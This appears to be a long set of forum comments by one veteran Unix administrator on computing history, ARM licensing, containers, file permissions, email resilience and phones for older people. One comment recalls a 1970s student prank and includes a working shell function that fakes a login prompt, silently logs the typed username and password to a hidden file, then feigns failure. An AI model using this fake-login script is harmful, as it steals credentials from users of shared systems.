Re: Yes, those were the days - NOT
One of these days I will learn to type and spell correctly. Not holding my breath, though.
At Claremont Tower at Newcastle Uni. in the late 1970s, the solution was to put yellow tape on the floor around the Ampex memory cabinet on the S/370, with dire warnings in big letters that anybody going into the exclusion zone would be ejected from the data centre sharpish.
I do not know whether it was physical movement or static, but the 370 did not like losing 4MB of its 6MB memory.
Actually, thinking about it, that's not that different from the social distancing measures being taken now.
In the 1980s, I looked after a Systime 5000E (repackaged PDP11/34A with 22 bit addressing bolted on) which had CDC SMD drives rather than DEC drives.
We paid an external data company to clean the platters of all of the disk packs about once every 6 months (normally during the academic vacations). This was mainly because we would regularly switch disk packs, as we ran two OSs (RSX-11M and UNIX Edition 6, later 7) at different times of the week.
The guy came in with a machine that would not only allow him to clean (with solvent and special large lint free giant cotton bud like tools) but also check the balance and warp of the platters to try to stop head crashes. I think it earned us a slight discount on the system maintenance cost.
When they came in, they wanted the space they would work in to be deep cleaned, and insisted that the doors and windows were shut while they were working.
Our biggest bugbear was heat. It was meant to be an office-environment machine, but we found it required more ventilation than we could give it, and we anxiously watched the thermometers during the summer. It was a difficult decision to either open the windows and let dust in, or keep them shut and watch the temperature. The bean counters would not allow us to buy a window-mounted AC unit, which would have been the best solution.
So this would be the Acorn Network computer, yes (and running an ARM chip)?
But there is prior art!
NCD had X terminals in about 1987 (which may or may not have had the Display Manager running locally, depending on how they were configured), and it is not too far a stretch to get to the AT&T Blit in about 1983, although that was neither cheap nor compact.
It would not surprise me to find something from Xerox PARC knocking around at about the same time as well.
I'm a good IT contractor. I'm a lousy company administrator and director, as was proved by the 10+ years of trying and getting fined regularly by the Revenue and previously Customs for filing my returns late (I know, you can now find big panel accountants who will do most of the work, but that hasn't always been the case).
But around 10 years ago, I found that I could forego the marginal tax and NI savings (I was actually opposed to tax avoidance measures anyway, which is why my accountants didn't like me), and found it was just easier to be the employee of an umbrella. I'm a cop-out contractor, I know. My decision.
And now, with IR35 looming again, I'm smiling inwardly at the predicament of all of the contractors I know whose anxiety is ramping up again pending next April. I've already seen many friends leave contracts that they could have extended because they're so worried about what the Revenue will do, and the way that the IR35 change was crassly delayed last March was a joke.
I was particularly annoyed when the umbrella company I use outsourced the authentication of their web portal to Facebook.
What this means is that I have another Facebook account (besides the bare account I keep to allow me to access services from companies that think FB is the only way to interact with their customers on the Internet) that I know very little about. I don't know exactly what is stored under it. I'm also a little uncertain about how outsourcing the authentication to a third party actually fits into GDPR, and I don't remember explicitly agreeing to have the data transferred to FB, and I normally read the T&Cs (difficult when they're so long and boring) when I'm asked to. Maybe I should put a data protection request in to see.
Yes, I know that Nvidia have in the past been a bit of a problem with regard to their graphics processors, but that particular clip is from 2012. Some things have changed, and at least for some of their older GPU architectures they are providing some documentation, and they do have half-decent binary drivers now (their offerings used to be crap, and well out of date).
But ARM is a completely different market. Nvidia have a high mark-up on their GPUs and need to protect that revenue stream. They cannot take the same model and apply it to ARM designs.
Firstly, ARM do not currently control the manufacture of the devices, and they only collect the initial use license fee and a very small per-core license fee.
Secondly, there are already licensees who have perpetual rights to take their existing designs and re-implement and modify them. This means that even if the new owner decides to take future core designs private, that will not stop existing designs evolving. If they do this, they run the risk of fracturing the market, and they need high volumes to be able to continue to get revenue on the low per-core license fee.
Thirdly, if they decide to limit or increase the cost of new licenses and license renewals, this will give the chip companies a reason to invest in other architectures like RISC-V and even MIPS (companies like themselves!)
Remember, the only thing that really makes ARM processors stand out is their low component count and power, licensing terms and ubiquity. The architecture has always been relatively simple, even with some of the newer designs. There is no reason at all to suppose that given the right impetus, other simple designs could not be produced. ARM have a head start, but there are a lot of people out there who could devote a lot of resources to try to catch up using already existing or new work. It's just that at the moment it's not worth it.
Nvidia will not want to take the technology private. It's not worth $40bn in cash and stock just to have another private design. The value is in volume and market penetration.
That's a radical statement. Care to elucidate?
They say that the licensing model will persist, and besides that, chip makers already have licenses, several of which are architecture licenses which allow them to extend the architecture and are perpetual.
This means that Arm devices are here to stay, and in case you didn't notice, already have Linux ported to them.
As an example, look at Raspbian running on a Pi 4. I could quite happily use that as a desktop system.
What may change is the cost of non-perpetual licenses. Some companies may find the cost of their license renewals increasing or becoming unavailable, but too much of the latter will kill the business.
Sometimes I wonder just how much of the manufacturing that happens in China is actually economical and profit generating.
I know that the postage rates are skewed against other countries' postal systems, but when you can buy cheap tat direct from China with free postage at less than the price it would cost merely to ship it within the UK, you have to wonder whether there is some Chinese subsidy in the system, either explicit or implicit, designed to make sure that low-cost manufacturing is killed in other countries.
In the past, when China was emerging from its shell and did not allow currency exchange, I always had the opinion that it was being done to enable China to get foreign currencies. You know, pay the workers and materials in Yuan, which has no value outside of China, and sell in dollars and pounds. But surely we're way past that point now.
Unfortunately, decreasing infant mortality does not in itself reduce population growth unless it is tied to education that a large number of children is not desirable.
Many people living in marginal environments have to have a lot of children because not all of them survive, and their children are their pension. But they don't necessarily make the link between these things themselves; it's ingrained in their society. In these societies, having a large number of surviving children is a statement of high status, and this will not change overnight.
Just allowing more of the children to live is not going to immediately reduce the family size, at least not until the 3rd or 4th generation. By this time, exponential growth as a result of more children reaching childbearing age will make the situation worse.
In the long term, I do agree, but it's not enough in itself.
If you eliminate the containers, you don't even have those duplicated files in the first place!
I am aware of how the union filesystems work (and have been for many, many years), but on a single OS image, you do not need to even have this complexity.
I was not really serious about eliminating containers, because they do provide some isolation from the underlying host OS, allowing applications from different OSs to sit on a single system without the overhead of full OS images under a hypervisor. But I was partly serious about moving everything back to a single OS, although some of the resource isolation features may need to remain to guarantee minimum resource allocations.
I know that "everything to run will be in the container", and have even been playing about a bit with things like Docker.
I know that you are supposed to spin up the container running as few processes as possible (although thank heaven the original "one process per container" idea seems to have been dropped), but many existing applications are not written to work like this.
The article says that it is a kernel (and presumably sufficient libraries), but also says that the toolset is written in Rust (to eliminate security holes and memory leaks, apparently). Has the full GNU toolset been ported to Rust? I think not.
When I think what is happening, I feel that what we have with containers is a shift up the virtualization stack. We had an OS which ran applications and processes. They then put in Hypervisors above the OS, to allow isolation between different OS images. We've now moved down a level, so the hosting OS becomes the Hypervisor, the container becomes the OS, and the applications are... still applications.
I wonder how long it will be before someone suggests radically revisiting the process-to-process isolation, and deleting the containers as wasteful, so we then go back to properly isolated processes running on a secure OS. Round in a full circle.
You are aware that bash (at least on Linux) is a shell, not a terminal emulator?
The difference is that shells process commands, and the terminal emulation handles the presentation. This allows you to keep the same terminal emulation while changing the shell you want to use.
I know I'm an old fogey, but this type of confusion between components on systems is part of the root of many of the problems with modern CLIs.
You use something like Putty or an xterm to get access to the system, and you then run a shell such as bash or ksh through that access to run commands. This allows you to separate the terminal emulation from the command processor. So the terminal emulator handles driving the screen, handling keys and doing the copy/paste, and the shell runs commands.
It fits in with the Unix ethos, do one thing, and do it well.
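You can see the separation for yourself from inside any session. A minimal sketch (assuming a POSIX shell and a working ps; the exact names reported will vary by system):

```shell
#!/bin/sh
# Minimal sketch: the terminal emulation and the shell are separate
# components. $TERM names the terminal type the presentation layer
# provides; the shell is just another program with its own PID.

echo "Terminal type (presentation layer): ${TERM:-unset}"

# Ask the process table what the current command processor is.
current_shell=$(ps -o comm= -p $$ 2>/dev/null || echo "sh")
echo "Command processor (shell): $current_shell"

# Starting another shell (ksh, bash, ...) from here would swap the
# command processor while $TERM, and the emulator drawing the
# screen, stay exactly the same.
```

Run a different shell from that prompt and re-run the two lines: the second answer changes, the first does not. That is the whole point of the split.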
I know this is conflated by the monolithic commands that developers appear to like developing now, where a single tool does everything, and that has its place for some types of applications, but basic OS commands should IMHO be independent of the terminal access.
This is something that I don't believe Windows has ever done properly. The command.com window was seen as just for legacy DOS type programs. Maybe this is a move in the right direction.
The Linux Foundation is an organizing group that looks to standardize and co-ordinate Linux development. It appears that all you need to do to become a platinum member (necessary to get a seat on the board) is donate $500,000 per year, and have some interest in Linux development.
Microsoft has an interest in Linux development. They are building Linux based technology into Windows, and they have to support Linux in their Azure cloud, because customers want it.
I believe that there are quite a lot of Microsoft contributions to the Linux kernel. According to some articles, in the last year they have been the fifth largest contributor. I have not looked myself, but they are almost certain to have put code in to ease Azure compatibility, and the Windows Subsystem for Linux will almost certainly have some code in the kernel tree to smooth out the interface with Windows. And it would not surprise me if they have more in there as well.
I am suspicious about Microsoft involvement, but it may be that there is a place in the Foundation for them. But I would be wary of it, if I was another board member.
Other people have hinted at what I'm about to say, but I don't think anybody has explicitly said it.
Using a tool that is not open source (say Teams or Slack) puts the project at risk of changes in those tools. The good thing about email, and its lowest-common-denominator 7-bit ASCII, is that email is a distributed system that would continue to operate even if Microsoft or Google or any other mail provider disappeared overnight.
Even if GitHub were to disappear, as long as there was a copy of the source in another git repository, it could be re-built relatively easily.
If there were a non-proprietary, open source, distributed collaboration system available, that might be better. But this is not the way the computing ecosystem is going, as these systems need to be paid for by someone, and for a non-profit that does not charge for what they produce, finding money to pay for something is difficult.
Everyone has email servers or at least access to them, so Linux kernel development is piggybacking on something that is being provided for other reasons.
I think when it comes to the character set that the kernel is programmed in, you have to look at the computer language that it is mostly written in. That is C. C is a computer language that assumes a certain character set, and that will almost certainly be similar or the same as 7 bit ASCII, or one of the related supersets in ISO or UTF 8 bit character sets.
You can almost certainly write comments or function or variable names using whatever is allowed by the superset that a compiler will accept, but the basic keywords are defined in English.
I'm sure that there is some code written in Cyrillic, or in the compound ideograms used by East Asian languages, but as soon as you start doing this, you close the code off from the rest of the world. You already see this when looking at, say, electronic datasheets on the Internet, as those written in Chinese for devices that originate in China are incomprehensible to the majority of the world.
This may be cultural imperialism, because English-speaking countries were so dominant during the development of the basic computing infrastructure, but I believe that writing compilers and complex systems in something like zhōngwén is complicated and unlikely to happen.
Back in the early '80s I worked at a Polytechnic, and was responsible for spending a chunk of the contingency fund at the end of one financial year, with the aim of producing a teaching room for what was called "Computer Appreciation". The purpose was to have lots of different types of hardware available so people who did not know anything about computers could see what they could do. The systems were BBC micros, of course.
One of the devices we found was a robot arm with six axes of movement that was very functional for the price. To keep the costs down, they used normal rotary motors, with shaft encoders made up of IR transceiver devices, with a four-quadrant rotating reflector on each shaft to 'bounce' the IR back from the transmitter to the receiver. It was all very elegant, and worked really well.
That is, until I tried using one in direct sunlight one day. Unfortunately the design did not have light covers on the encoders. As soon as I issued the return-to-home command to the controller to calibrate the position, it started all the motors (something quite interesting, because all the motor channels could run simultaneously, unlike most of the other non-industrial teaching robots), and proceeded to pull itself off the desk as all of the moving parts moved to the physical end-stops, causing the arm to contort in a way it was never designed for.
We worked out that the bright sunlight swamped the IR detectors, so even though the motors were running, it could not detect the movement of the rotary shafts. I suspect that there was also a bug in the controller software that needed to see the shaft rotate before it would look for them to stop to detect the end stops, but I never knew that for certain.
The fall damaged some parts, so we went back to the manufacturer, and asked whether they could provide spares. We explained how the problem happened, and they said that they would see about designing some light tight covers, but although we got the parts to repair the robot (they came in kit form anyway, so replacing some of the parts was not a problem), we never saw any covers from them.
Shame really. They were the best educational robot arms I ever saw, so long as you used them out of direct sunlight. It's a shame that some of the HND students never saw fit to do their project with the kit available in the lab, as we had hoped. I often wonder what happened to all of the 'toys' when the lab was replaced (I left before it was dismantled), but I guess that some of the lecturers with their own BBC micros gave them a home.
The thing about ARM and their processor designs is not that they are particularly special as far as the techniques go, but that no other chip manufacturer has managed to produce a chip that provides performance at a very low power budget.
Even Chipzilla gave up the fight, although they were trying to reduce the power consumption of their existing family of processors (because they thought compatibility would be a big selling point), not trying to produce a new design from the ground up.
There have been and are other processors that could steal ARM's crown. RISC-V is the most obvious candidate, but I'm sure that the MIPS processor designs could be re-engineered to produce low power designs, and I'm following whether some of the micro-controllers from people like Microchip Inc, or NXP may be enhanced with more capable instruction sets, but they seem to have selected ARM for their more capable offerings.
But ARM have a major head start, with proven designs available at reasonable licensing costs, available to build into SOC designs. And some of the features, like big.LITTLE are very clever at producing designs that are very low power, but can scale up to higher performance very rapidly.
What will decide whether ARM remains a dominant design is probably whether the people who end up owning the IP want to try to increase revenue by upping the license costs (like Softbank said they were going to try to do). Once ARM licenses are seen to be more expensive than the investment needed to make RISC-V or another design bear fruit, the advantages of ARM will be lost.
I know people who were brought into IBM as part of a TUPE, and remained there for significant amounts of time (more than 10 years), and some until they retired.
But it depends on the skills and usefulness. I suspect that any of the EY staff that have any Cloud or recent security experience will be OK, but probably not those who are involved with rather more traditional technologies.
Were you serious about the PDP-11? What browser are you using? I would have thought that even an 11/93 or 94 would struggle with the most lightweight of browsers, unless you're still keeping Lynx or Lyx going, and if so, do many websites still provide text-only rendering of web pages? Does X11 even work?
Or do you have one of the Mentec upgrades or the ASIC re-implementations? But still, the memory restrictions inherent in the architecture would provide serious problems for modern browsers even with 22-bit separate I&D systems.
Maybe I'll give it a go, but it would have to be in emulation for me.
Of course, to counter the people who wonder why it is not vulnerable, the PDP-11 never included any speculative prefetch features, so by definition cannot suffer from any of these issues.
The picture at the top of the referenced article has clearly been Photoshopped!
The left hand set of tanks clearly 'chop' the top of the right hand yellow bollard. And when you look closer, the shadows on the three sets of tanks are not consistent with each other and the building on the left!
Shoddy work by Microsoft PR.
I said nothing about smartphones. They are even more unsuitable.
You must be lucky to only know older people without any health issues. Pretty much all of the people over 70 that I know have one or more of the problems I've outlined, especially age related farsightedness. I'm only 60, and yet I find I have to juggle spectacles in order to do different things (and did, even when I wore varifocals almost all the time - but I had myopia and now have presbyopia creeping in).
If you want cheap, you just need to look at Tesco.
Don't know if they still have it, but they had an Imo phone (never heard of them) for £14.99, or £4.99 if bought with £10 Tesco Mobile credit. It's not a great phone, but it works and it's crazy cheap, especially if you were already using Tesco Mobile.
As always, it depends on the user's capability and what they want to use it for. My father is deaf to frequencies above about 1 kHz, and literally cannot hear the ringtones that come as standard on most phones.
Add to that the fiddly nature of plugging in a micro USB cable to charge, the ease that most phones like this can be dropped and the inability of some people with presbyopia to see the screen and legends on the buttons for phones like this one, and you can see why it is not that suitable for many older people.
Of course, many are lucky to still be dexterous, able to see close up, and still have their hearing, but I know a fair number of older people with at least one of the problems I've outlined, for whom this phone would be difficult to use.
There are already several phones out there that are better. Just search on Amazon.
What most older generation people need are:
1. A VERY loud ringtone that is lower frequency than most of the normal stock ringtones
2. A VERY loud speakerphone mode that is easy to engage
3. Large buttons, with the answer button easy to find
4. Easy to set up speed dial for single press calling
5. As large a screen as can be reconciled with point 3
6. A large, clear font, together with an appropriate UI to make selecting contacts as easy as possible
7. A long battery life, together with easy charging, like a cradle
8. Anything that is not directly associated with making and receiving calls not cluttering the UI
9. An emergency call button easy to find when wanted, but not so easy that it can be pressed by accident.
And this should all be in a package that is easy to hold for people with grip issues, and robust enough to survive being dropped.
This Nokia phone does not meet many of these criteria.
This is not an advert, but I bought a Chinese phone badged Ushining from Amazon for my dad recently, as it ticks nearly all of the points I outlined. There are several other phones from Doro, Artfone and Easyfone, amongst others.
But I wonder how many of the people who rely on setting permissions to 0777 have come from a Windows background, and do not know of any other way to make their applications work (I have come across numerous people over the years who say something like "Why do all these security restrictions exist? It makes my job so much harder...")
I complain bitterly to anybody who sets something like this up on a system that I have some responsibility for. It does not always stop it, however, as JFDI appears to apply in management's eyes, and I do value working.
Too many people think that *they* are the only people working on a multi-user system.
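For what it's worth, the right habit is a sensible umask rather than chmod 0777 after the event. A minimal sketch (assuming a POSIX shell; the stat format flag shown is the GNU one, with a BSD fallback):

```shell
#!/bin/sh
# Minimal sketch of the alternative to chmod 0777: set a sensible
# umask and let every new file and directory come out group/other
# read-only by default.

rm -rf demo_dir           # start clean in case of a previous run
umask 022                 # new files: 0644, new directories: 0755
mkdir demo_dir
touch demo_dir/demo_file

ls -ld demo_dir demo_dir/demo_file

# Owner keeps full control; group and others can read (and traverse
# the directory) but crucially have NO write access.
perms=$(stat -c %a demo_dir 2>/dev/null || stat -f %Lp demo_dir)
echo "demo_dir permissions: $perms"

rm -r demo_dir            # tidy up
```

Put the umask in the login profile (or a more restrictive 027 for shared machines) and nobody needs to reach for 0777 to "make it work".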
It was the other way around. Someone went into one of my folders and moved files around.
Ouch! I should have checked myself, so I guess I'm part of the problem.
But that could not happen by default on systems with NFS-mounted filesystems that I administer (nor, in the past, on AT&T RFS (look it up) or DFS and AFS filesystems, whose ACL systems are more like Windows). Directories are created as 0755 or 0750 (depending on which environment I'm working on) by default.
... indicate how unsuitable MS/PC DOS was as a network operating system, something that persisted into the Windows era until the advent of NT.
But it trained several generations of system admins and developers to be extremely lax with how they treated the security of the systems they worked on.
Even now, it seems that many organizations do not even take the basic steps to enforce decent limited user access on their Windows shares. I was looking at one of the shares I have to use the other day where I work (at ostensibly an IT company) and saw that by default all shares were open for write access for everybody, even those that were specific to users and teams. No wonder ransomware can be so devastating in these environments!
Windows can do it properly. Why don't people use these protections?
I'm not sure. As far as I'm aware there's no 'free' version of Red Hat. There are Fedora and CentOS, but neither of these is actually branded "Red Hat", and both of those are supposedly community-supported products, with some financial sponsorship to keep them running.
It was some time ago, but I tried to download a copy of Red Hat Enterprise Linux, and it was difficult without evidence of a support contract.
I look at their current site, and I can see a "Free, 30 day evaluation", but that is not the same as free.
They make the source of all of the 'open' parts of Red Hat available, and contribute upstream, but that is not the total of RHEL, and as far as I know, they do not provide a 'built' version of what is on GitHub. You are free to download it and build it yourself, and they even tell you how to do that, but this is beyond most users. Or you can get a downstream distro like CentOS (which used to be completely separate from Red Hat), but that is not really a Red Hat release.
Using the suggested LibreOffice model, there should be a freely available Red Hat Personal Linux or something similar. Instead, we have Fedora which is like a beta program for some of the upcoming technologies, with an upgrade model that makes it impossible to do anything like an LTS release of Fedora. If you use Fedora, you're either frozen in time or on a fast running treadmill to keep up.
IMHO, Canonical has a better model, where they really do have the same products for community and enterprise freely available and patched to a defined schedule, with paid support and education (and some closed management tools and application frameworks) as the differentiating points. This is the reason why I never got on the Fedora path when the original, really free Red Hat Linux was discontinued in the early 2000s.
Red Hat are doing some important (and also some really annoying - think Lennart Poettering) things in the open source space, but IMHO, their Open Source credentials are not as convincing as people think.
These are my personal opinions, and you are free to disagree.
The count of the number of tests being done was a meaningless number collected initially to show the government had achieved a target.
The reason why it is meaningless is that it did not indicate the total number of people tested, as some people, like NHS workers, will have been tested multiple times to make sure they remained free of infection so they could continue to work safely.
I don't believe that the articles actually say the tests were being stopped.
Not testing everybody who has been traced does not make any sense, however. Especially as there is no guaranteed sick pay for the people they're telling to lose 2 weeks income. People who absolutely need the income will just ignore the warning unless they either show symptoms, or it becomes a criminal offense to not isolate.
Late 1980s. Large telecoms development company. Mainframe data centre just outside a small Wiltshire town supplied by overhead power cables. Enterprise grade UPS with diesel backup generators.
What we learned was that multiple power brown outs during a significant thunderstorm was sufficient to defeat this setup.
The problem was that each time the power grid browned out, the UPS would kick in, switching to battery and temporarily turning off the air conditioning, which would have been switched back on once the generators started. But the mains power resumed before the generators started, so the UPS switched back to mains, and shortly afterwards the aircon came back on.
Until the next brown out a few minutes later, and the next, and the next. Over the course of about 2 hours, the batteries became depleted, as there was no time to recharge them after each brown out, and the temperature in the machine rooms began to rise as the air-con was off so much of the time.
Eventually, even though the UPS should have been able to keep the whole DC running, it was decided to turn off the mainframe and the development and test environments, and halt work for the rest of the day.
I'm not sure why, but a manual switch to generator had been overlooked in the design of this setup, which would have been able to keep the data centre running had there been one. What this taught me was that even professionally designed, very expensive UPSs are not a guarantee of continual operation.
Back in the early 90's, and very late one evening when I was providing on-call support, I was on a call from a customer who had managed to do an "rm -r" (fortunately on a data filesystem rather than /) on one of their systems, but who had very sensibly just hit the power button, and was wanting to recover as much as they could.
I sat on the phone with them for a while, talking to them continuously, while I worked out in the background (by deliberately corrupting a filesystem on one of our test systems) how to scan the filesystem using icheck and fsdb to work out which inodes with zero link counts still contained the block list for the deleted files.
Once I had this sorted, I got the fax number for their office from our customer records, and sent the script to it from my desk using our fax server. I then said I was sending them the script, and they asked how I was sending it, and how long would I take. By that time the fax had left the queue, and I just asked them if they knew where the fax machine for the number I'd sent it to was, and that they would find the script there. I could never understand why they were so surprised when they looked and found it. Shows that even technical people did not fully appreciate the advantages of an integrated IT system.
Once they knew that they had the script, and that it worked (it set the link count in the inode to one, and then let fsck sort out re-linking the file into the lost+found directory), I left them to it, saying that they could page me again if they had any further problems, which they did not do.
I got into the office the next day to find that the customer had completed the procedure, and had all of the data that they could not live without back (although not all of the files). The credit for closing the call went to the start-of-day person who called them back to confirm the state of the call!
And did I get any thanks? No. Of course not. I actually doubt that any of the other on-call specialists in the centre had the same knowledge of the UNIX filesystem, the fax machine setup and the test systems to be able to do the same.
I'm not sure you fully understand the case.
The issue is that Apple are using trademark legislation to prevent what could well be genuine parts, removed from broken or failed devices, from being used for repair.
Their assertion is that the parts are actually counterfeit, and they seem to have persuaded the Norwegian legal system that this is the case.
They do have a case. There are counterfeit parts manufactured and sold as genuine. But there are also genuine parts available. It is difficult to tell on cursory examination.
As I understand it, there is also a grey area where damaged genuine parts have the damaged elements replaced, for example, a functional genuine screen with damaged glass has the glass replaced, probably with the same spec. glass that Apple use, so is an amalgam of a genuine and after-market part. Does that make it counterfeit or genuine? I'm not sure, but Apple assert that it is counterfeit.
Apple says that anything they didn't supply that carries any Apple identifying symbols must be counterfeit, something that is almost certainly not true. As a result, the supply of parts is stifled to just what they deign to supply, at whatever price they want to sell at, plus the real counterfeit parts (which they also want to ban, but currently have difficulty doing).
Once they get this, they can control the parts supply to make it uneconomical to repair their products. In a normal supply-and-demand economy this should damage their brand, but it seems the buying public are just so enamoured of that logo that they continue to pay large sums for devices that may well break and become unrepairable long before the customer expects.
Basic student prank back in the late 1970s: write a shell script to emulate the login screen on a UNIX system, to capture the user ID and password of the next user of the terminal.
Second level, write it in C so that it would not display the password when it was typed (the stty program was less advanced on Edition 6, and did not have -echo and echo, and if you used raw mode, it was difficult to process end-of-line correctly in shell).
It was a war of wits. When you walked up to a terminal, you pressed return several times to cycle through to the real login screen; the programs were then changed to notice the empty username and loop. Then you used EOF to get getty to recycle, and the programs were changed to trap EOF and loop round. Then you pressed break (the default interrupt on Edition 6), and the programs started changing the interrupt character.
The best of the login screen key loggers that were written were really sophisticated towards the end of the 'war'.
Eventually, the sysadmins started threatening to ban students engaged in writing these programs, but not before finding the source code and examining how they were doing what they were doing. UNIX was new back then, and everybody was learning from each other!
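The first-level version of the prank is simple enough to sketch as a shell function. Everything here is hypothetical (names and the capture path are invented), and suppressing echo with stty is exactly the part that needed C on Edition 6:

```shell
# fake_login: imitate the login prompt, record what is typed, then fail.
# CAPTURE is a hypothetical path where the prankster collects credentials.
fake_login() {
    printf 'login: '
    read user
    # Suppress echo while the password is typed; harmless if not on a tty.
    stty -echo 2>/dev/null || true
    printf 'Password:'
    read pass
    stty echo 2>/dev/null || true
    printf '\n'
    echo "$user:$pass" >> "${CAPTURE:-/tmp/.capture}"
    # Mimic a failed attempt so the victim just tries again on the real getty.
    echo 'Login incorrect'
}
```

On a real terminal the script would then exit, letting getty put up the genuine login prompt for the victim's second attempt.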
Strictly speaking, it was PL/1 (Pea El One), although the 1 was often written as an "I", as in the Roman numeral. But I get a bit upset when someone pronounces it as Pea El Eye, which people are prone to do.
But yes, it tried to be all things to all people: a scientific language, a business language, a control language and, in some of its incarnations (like PL/C, which I used when learning PL/1 as a formal language in 1978), a teaching language.
It had many unusual features. The one that I found most interesting was implied loops in I/O statements, which allowed whole or even partial arrays to be written out in a single PUT statement.
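If memory serves, the implied (repetitive) loop looked something like this; the syntax is from memory, so the details may be slightly off:

```
DECLARE A(10) FIXED;
/* One PUT statement writes the whole array via an implied DO loop */
PUT SKIP LIST ((A(I) DO I = 1 TO 10));
/* ...or just part of it */
PUT SKIP LIST ((A(I) DO I = 3 TO 7));
```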
The other language I was formally taught was APL (literally A Programming Language) of which I used to say (somewhat repetitively) "It's all Greek to me!"
Neither of them helped me with my first job, which was as an RPG2 programmer! Thank goodness I had taught myself C while at University. And I had no problem teaching myself Pascal at my second job.
You're not thinking far enough back.
Before the rise of Google, Yahoo, Hotmail et al., email was very distributed. Major operations ran their own SMTP server which, provided that TCP/IP and DNS MX records continued to operate, would allow messages to get through even when there was some disruption. And TCP/IP was originally intended to be resilient, and DNS is, by its very nature, distributed.
This wasn't very helpful for home users, but did work well for companies, and hey! there wasn't the demand for email from joe public.
Sure, an organisation's own server might go down, but it's really not that difficult to have multiple mail exchangers for a mail domain, and many did. But even if one company's mail server broke, the rest of the email infrastructure around the internet didn't, and undelivered mail would eventually get through if the service was restored, or generate a bounce message to the sender after a timeout if it wasn't.
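As a sketch (a hypothetical zone-file fragment with invented names): a domain simply lists several MX records with different preference values, and sending servers try the lowest preference first, falling back to the next if that exchanger is down:

```
example.com.   IN  MX  10 mx1.example.com.   ; primary exchanger
example.com.   IN  MX  20 mx2.example.com.   ; tried if mx1 is unreachable
```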
We're now suffering from single large suppliers of services becoming single points of failure, outside the users' or customers' control. The very intent of the distributed Internet is being undermined by large service providers like Google and Facebook, and even companies that do understand are putting their eggs in the baskets of AWS and other cloud providers (Slack runs on AWS, yes?)
It's all looking a lot like the '60s and '70s, when companies used to do their batch processing at computer bureaus, but on a vastly larger and more pervasive basis.
I've recounted this story before, but when I was in support for a large multinational business system supplier, I was the co-ordinating specialist for a consortium of educational customers who were getting a reputation for not checking or testing any fixes we supplied to them. Unfortunately, they were important for PR reasons, which is why they had an allocated specialist as a primary contact point.
One of my jobs every week was to call my contact there and ask whether they had made any progress in applying any of the updates or fixes they'd been given.
One frustrating day, I put into the problem record my true feelings, something along the lines of "Sheesh, <Customer name> applying any fixes? Not a chance!". It was only mildly derogatory, but what I didn't realize was that not only did the customer have a technical advocate, they also had a relationship manager who allowed them to read the problem records....
I was duly hauled into my manager's office with the relationship manager, and whilst my manager privately agreed with my sentiments, he had to be seen to be telling me off.
Unfortunately, a few months later, the then relationship manager moved into the support centre - as my manager! Fortunately, he was quite a decent guy, and we actually ended up with a good working relationship once we had cleared the air.
There was a K6-III as well, and it held its own very well against the Pentium III, although not all Socket 7 motherboards would work with them.
Wikipedia says that the K6-III+ tops out at 500MHz, but I was pretty certain that I had one rated for 550MHz, although it could have been a K6-2+.
The dangerous commands comment should, obviously, carry the caveat that if you run commands you do not understand as a privileged user, you should have your privileges revoked immediately.
I don't know how Unix got dragged in here, but ever since UNIX Edition 2 or 3 in the 1970s there has been the concept of ordinary users and privileged users, so there is no excuse for doing day-to-day user tasks with a privileged account.
Biting the hand that feeds IT © 1998–2020